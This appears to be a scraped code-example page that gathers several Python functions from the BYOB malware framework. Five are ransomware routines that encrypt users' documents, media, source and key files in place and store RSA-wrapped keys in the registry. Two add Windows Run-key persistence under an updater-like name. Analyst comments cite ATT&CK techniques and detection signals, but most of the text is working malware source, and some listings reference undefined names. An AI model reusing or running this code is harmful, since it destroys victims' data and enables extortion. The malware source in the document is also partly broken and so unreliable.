Exemplo n.º 1
def encrypt_file(path):
    """
    Ransomware-style routine from the BYOB sample: encrypt one file in place.

    Intended flow, as written in the statements below (ATT&CK T1486,
    Data Encrypted for Impact):
      * skip anything that is not a regular file with a listed extension
      * build a per-file AES key string (MD5 hex digest of 16 random bytes)
      * read the whole file, encrypt it, rewrite the same path
      * wrap the AES key with an RSA public key (PKCS#1 OAEP), base64 it,
        and hand it to util.registry_key with the file path as the name

    :param str path:    candidate file path

    Returns None on every path; exceptions raised in the body are caught
    and only passed to util.debug.

    NOTE(review): several names used here (`crypto`, `publickey`,
    `encrypt`) are not defined inside this listing, so whether it runs as
    shown depends on code that is not visible - confirm against the module.
    """
    try:
        # Target selection: only regular files whose extension appears in
        # this list (documents, media, source code, certificate/key files)
        # are touched; everything else returns immediately.
        if not os.path.isfile(path) or not os.path.splitext(path)[1] in [
                '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg',
                '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg',
                '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js',
                '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
                '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb',
                '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst',
                '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf',
                '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
                '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay',
                '.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef',
                '.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx',
                '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx',
                '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
                '.js', '.rb', '.xml'
        ]:
            return
        # A new key string is generated for every file.
        aes_key = Crypto.Hash.MD5.new(Crypto.get_random_bytes(16)).hexdigest()
        # The complete file content is loaded into memory.
        with open(path, 'rb') as fp:
            plaintext = fp.read()
        ciphertext = crypto.encrypt_aes(plaintext, key)
        # The same path is reopened with 'wb', so the original content is
        # replaced. Detection: one process rewriting many user files in place
        # with high-entropy data is a typical behavioural signal.
        with open(path, 'wb') as fd:
            fd.write(ciphertext)
        # The AES key is wrapped with the RSA public key; only the holder of
        # the matching private key can unwrap it.
        cipher = Crypto.Cipher.PKCS1_OAEP.new(publickey)
        key = base64.b64encode(cipher.encrypt(aes_key))
        # Forensic artefact: registry key SOFTWARE\BYOB, one entry per file
        # (name = file path, data = base64 wrapped key). util.registry_key is
        # not shown; presumably it selects the hive - confirm.
        util.registry_key(r'SOFTWARE\BYOB', path, key)
        util.debug('{} encrypted'.format(path))
    except Exception as e:
        # Failures are swallowed after a debug message.
        util.debug("{} error: {}".format(encrypt.func_name, str(e)))
Exemplo n.º 2
def encrypt_file(filename, rsa_key):
    """
    Encrypt one file in place with a random 32-byte AES key, wrap that key
    with the supplied RSA public key (PKCS#1 OAEP), and record the filename
    together with the base64 wrapped key through util.registry_key
    (ransomware behaviour, ATT&CK T1486 Data Encrypted for Impact).

    The original description names AES-256-OCB and RSA-2048. The AES mode
    is decided inside encrypt_aes, which is not shown here, and this
    function only checks that rsa_key is an RsaKey instance, not its size.

    `Requires`
    :param str filename:          target filename
    :param RsaKey rsa_key:        public RSA key (RsaKey instance)

    Returns True if successful, otherwise False. A wrong extension or a
    wrong key type returns False without any log entry; exceptions raised
    in the body are caught and logged.

    """
    try:
        if os.path.isfile(filename):
            # Target selection: the extension must be in the module-level
            # 'filetypes' collection (defined outside this listing).
            if os.path.splitext(filename)[1] in globals()['filetypes']:
                if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
                    cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
                    # New 32-byte key from the OS random source, per file.
                    aes_key = os.urandom(32)
                    # The complete file content is loaded into memory.
                    with open(filename, 'rb') as fp:
                        data = fp.read()
                    ciphertext = encrypt_aes(data, aes_key)
                    # Same path reopened with 'wb': the original content is
                    # replaced. Detection: bulk in-place rewrites of user
                    # files with high-entropy data.
                    with open(filename, 'wb') as fd:
                        fd.write(ciphertext)
                    # Only the holder of the matching RSA private key can
                    # unwrap the stored AES key.
                    key = base64.b64encode(cipher.encrypt(aes_key))
                    # Forensic artefact: one registry entry per file (name =
                    # filename, data = wrapped key) under the module-level
                    # 'registry_key' path; its value and the hive are not
                    # shown here - confirm in util.registry_key.
                    util.registry_key(globals()['registry_key'], filename, key)
                    util.log('{} encrypted'.format(filename))
                    return True
        else:
            util.log("File '{}' not found".format(filename))
    except Exception as e:
        # func_name is the Python 2 attribute holding a function's name.
        util.log("{} error: {}".format(encrypt_file.func_name, str(e)))
    return False
Exemplo n.º 3
def encrypt_file(filename, rsa_key):
    """
    Encrypt one file in place with a random 32-byte AES key, wrap that key
    with the supplied RSA public key (PKCS#1 OAEP), and record the filename
    together with the base64 wrapped key through util.registry_key
    (ransomware behaviour, ATT&CK T1486 Data Encrypted for Impact).

    The original description names AES-256-OCB and RSA-2048. The AES mode
    is decided inside encrypt_aes, which is not shown here, and this
    function only checks that rsa_key is an RsaKey instance, not its size.

    `Requires`
    :param str filename:          target filename
    :param RsaKey rsa_key:        public RSA key (RsaKey instance)

    Returns True if successful, otherwise False. A wrong extension or a
    wrong key type returns False without any log entry; exceptions raised
    in the body are caught and logged.

    """
    try:
        if os.path.isfile(filename):
            # Target selection: the extension must be in the module-level
            # 'filetypes' collection (defined outside this listing).
            if os.path.splitext(filename)[1] in globals()['filetypes']:
                if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
                    cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
                    # New 32-byte key from the OS random source, per file.
                    aes_key = os.urandom(32)
                    # The complete file content is loaded into memory.
                    with open(filename, 'rb') as fp:
                        data = fp.read()
                    ciphertext = encrypt_aes(data, aes_key)
                    # Same path reopened with 'wb': the original content is
                    # replaced. Detection: bulk in-place rewrites of user
                    # files with high-entropy data.
                    with open(filename, 'wb') as fd:
                        fd.write(ciphertext)
                    # Only the holder of the matching RSA private key can
                    # unwrap the stored AES key.
                    key = base64.b64encode(cipher.encrypt(aes_key))
                    # Forensic artefact: one registry entry per file (name =
                    # filename, data = wrapped key) under the module-level
                    # 'registry_key' path; its value and the hive are not
                    # shown here - confirm in util.registry_key.
                    util.registry_key(globals()['registry_key'], filename, key)
                    util.log('{} encrypted'.format(filename))
                    return True
        else:
            util.log("File '{}' not found".format(filename))
    except Exception as e:
        # Any failure in the body is reduced to a single log line.
        util.log("{} error: {}".format(encrypt_file.__name__, str(e)))
    return False
Exemplo n.º 4
def encrypt_file(filename, rsa_key):
    """
    Encrypt one file in place with a random 32-byte AES key, wrap that key
    with the supplied RSA public key (PKCS#1 OAEP), and record the filename
    together with the base64 wrapped key through util.registry_key
    (ransomware behaviour, ATT&CK T1486 Data Encrypted for Impact).

    The original description names AES-256-OCB and RSA-2048. The AES mode
    is decided inside security.encrypt_aes, which is not shown here, and
    this function only checks that rsa_key is an RsaKey instance, not its
    size.

    `Requires`
    :param str filename:          target filename
    :param RsaKey rsa_key:        public RSA key (RsaKey instance)

    Returns True if successful, otherwise False. A wrong extension or a
    wrong key type returns False without any log entry; exceptions raised
    in the body are caught and logged.
    """
    try:
        if os.path.isfile(filename):
            # Target selection: documents, media, source code, scripts,
            # database and certificate/key files, matched by extension.
            if os.path.splitext(filename)[1] in [
                    '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg',
                    '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg',
                    '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php',
                    '.js', '.css', '.odt', '.ods', '.odp', '.odm', '.odc',
                    '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx',
                    '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb',
                    '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf',
                    '.wb2', '.mdf', '.dbf', '.psd', '.pdd', '.pdf', '.eps',
                    '.ai', '.indd', '.cdr', '.jpg', '.jpe', '.jpg', '.dng',
                    '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2',
                    '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw',
                    '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx',
                    '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem',
                    '.pfx', '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php',
                    '.html', '.css', '.js', '.rb', '.xml', '.py', '.pyc',
                    '.wmi', '.sh', '.spec', '.asp', '.aspx', '.plist', '.json',
                    '.sql', '.vbs', '.ps1'
            ]:
                if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey):
                    cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key)
                    # New 32-byte random key per file.
                    aes_key = Crypto.Random.get_random_bytes(32)
                    # The complete file content is loaded into memory.
                    with open(filename, 'rb') as fp:
                        data = fp.read()
                    ciphertext = security.encrypt_aes(data, aes_key)
                    # Same path reopened with 'wb': the original content is
                    # replaced. Detection: bulk in-place rewrites of user
                    # files with high-entropy data.
                    with open(filename, 'wb') as fd:
                        fd.write(ciphertext)
                    # Only the holder of the matching RSA private key can
                    # unwrap the stored AES key.
                    key = base64.b64encode(cipher.encrypt(aes_key))
                    # Forensic artefact: one registry entry per file (name =
                    # filename, data = wrapped key) under the module-level
                    # '_registry_key' path; its value and the hive are not
                    # shown here - confirm in util.registry_key.
                    util.registry_key(globals()['_registry_key'], filename,
                                      key)
                    util.debug('{} encrypted'.format(filename))
                    return True
        else:
            _debugger.debug("File '{}' not found".format(filename))
    except Exception as e:
        # func_name is the Python 2 attribute holding a function's name.
        _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e)))
    return False
Exemplo n.º 5
def _add_registry_key(value=None, name='Java-Update-Manager'):
    """
    Persistence through a Windows Run registry key (ATT&CK T1547.001,
    Registry Run Keys / Startup Folder).

    On Windows, when the 'registry_key' entry of _methods is not already
    marked as established, the path of the running program (sys.argv[0])
    is registered under the CurrentVersion Run key so that it is started
    again at logon.

    :param value:       overwritten with sys.argv[0] before it is used, so
                        the caller's argument has no effect
    :param str name:    name of the Run-key value; the default imitates a
                        software updater

    Returns (True, name) when util.registry_key did not raise, otherwise
    (False, None). Exceptions are caught and logged.

    Detection: a Run-key value with an updater-like name whose data points
    at a script or executable in a user-writable location. Registry
    value-set telemetry (for example Sysmon Event ID 13) and periodic
    autorun audits surface it.
    """
    try:
        # _methods is defined outside this listing; 'established'
        # presumably records that this persistence method already ran.
        if os.name == 'nt' and not _methods['registry_key'].established:
            value = sys.argv[0]
            if value and os.path.isfile(value):
                try:
                    # util.registry_key is not shown; the hive (HKCU or
                    # HKLM) is presumably chosen there - confirm.
                    util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value)
                    return (True, name)
                except Exception as e:
                    util.log('{} error: {}'.format(_add_registry_key.__name__, str(e)))
    except Exception as e:
        util.log('{} error: {}'.format(_add_registry_key.__name__, str(e)))
    return (False, None)
Exemplo n.º 6
def _add_registry_key(value=None, name='Java-Update-Manager'):
    """
    Persistence through a Windows Run registry key (ATT&CK T1547.001,
    Registry Run Keys / Startup Folder).

    On Windows, when the 'registry_key' entry of _methods is not already
    marked as established, the path of the running program (sys.argv[0])
    is registered under the CurrentVersion Run key so that it is started
    again at logon.

    :param value:       overwritten with sys.argv[0] before it is used, so
                        the caller's argument has no effect
    :param str name:    name of the Run-key value; the default imitates a
                        software updater

    Returns (True, name) when util.registry_key did not raise, otherwise
    (False, None). Exceptions raised in the body are caught and logged.

    Detection: a Run-key value with an updater-like name whose data points
    at a script or executable in a user-writable location. Registry
    value-set telemetry (for example Sysmon Event ID 13) and periodic
    autorun audits surface it.
    """
    try:
        # _methods is defined outside this listing; 'established'
        # presumably records that this persistence method already ran.
        if os.name == 'nt' and not _methods['registry_key'].established:
            value = sys.argv[0]
            if value and os.path.isfile(value):
                try:
                    # util.registry_key is not shown; the hive (HKCU or
                    # HKLM) is presumably chosen there - confirm.
                    util.registry_key(r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", name, value)
                    return (True, name)
                except Exception as e:
                    # func_name is the Python 2 attribute holding a
                    # function's name.
                    util.log('{} error: {}'.format(_add_registry_key.func_name, str(e)))
    except Exception as e:
        util.log('{} error: {}'.format(_add_registry_key.func_name, str(e)))
    return (False, None)
Exemplo n.º 7
def encrypt_files(args):
    """
    Ransomware-style driver (ATT&CK T1486, Data Encrypted for Impact):
    encrypt one path if its extension is targeted, record the wrapped key,
    and make sure a background worker thread is running.

    Intended flow, as written in the statements below:
      * match the extension of `path` against the list
      * build an AES key string and pass it to encrypt_file
      * wrap the key with an RSA public key (PKCS#1 OAEP), base64 it, and
        hand it to util.registry_key with the path as the name
      * if no live worker whose name contains 'encrypt-files' exists,
        start a new daemon thread running `threader` on `jobs`

    :param args:    not read anywhere in the body shown here

    Returns None; exceptions raised in the body are caught and passed to
    util.debug.

    NOTE(review): `path`, `workers`, `jobs`, `threader`, `_encrypt` and the
    object returned by encrypt_file are defined outside this listing, so
    its behaviour as shown depends on code that is not visible - confirm
    against the module.
    """
    try:
        # Target selection: documents, media, source code and
        # certificate/key files, matched by extension.
        if os.path.splitext(path)[1] in [
                '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg',
                '.jpeg', '.png', '.img', '.gif', '.mp3', '.mp4', '.mpeg',
                '.mov', '.avi', '.wmv', '.rtf', '.txt', '.html', '.php', '.js',
                '.css', '.odt', '.ods', '.odp', '.odm', '.odc', '.odb', '.doc',
                '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb',
                '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst',
                '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf',
                '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpg',
                '.jpe', '.jpg', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay',
                '.crw', '.cr2', '.dcr', '.kdc', '.erf', '.mef', '.mrw', '.nef',
                '.nrw', '.orf', '.raf', '.raw', '.rwl', '.rw2', '.r3d', '.ptx',
                '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx',
                '.p12', '.p7b', '.p7c', '.tmp', '.py', '.php', '.html', '.css',
                '.js', '.rb', '.xml'
        ]:
            # Key string: MD5 hex digest of 16 random bytes.
            aes_key = Crypto.Hash.MD5.new(
                Crypto.Ransom.get_random_bytes(16)).hexdigest()
            # The return value is used below both for its .pubkey attribute
            # and as the first argument of util.registry_key.
            ransom = encrypt_file(path, key=aes_key)
            # Only the holder of the matching RSA private key can unwrap
            # the stored AES key.
            cipher = Crypto.Cipher.PKCS1_OAEP.new(ransom.pubkey)
            key = base64.b64encode(cipher.encrypt(aes_key))

            # Forensic artefact: one registry entry per file (name = path,
            # data = base64 wrapped key); util.registry_key is not shown.
            util.registry_key(ransom, path, key)
            util.debug('{} encrypted'.format(path))

            # Start a worker only when none of the existing
            # 'encrypt-files' workers is still alive.
            if not len([
                    k for k in workers if 'encrypt-files' in k
                    if workers[k].is_alive()
            ]):
                rnd = random.randint(1, 100)
                # Daemon thread: it does not keep the process alive on exit.
                workers['encrypt-files-{}'.format(rnd)] = threading.Thread(
                    target=threader, args=(jobs, ), name=time.time())
                workers['encrypt-files-{}'.format(rnd)].daemon = True
                workers['encrypt-files-{}'.format(rnd)].start()
    except Exception as e:
        # Failures are swallowed after a debug message.
        util.debug("{} error: {}".format(_encrypt.func_name, str(e)))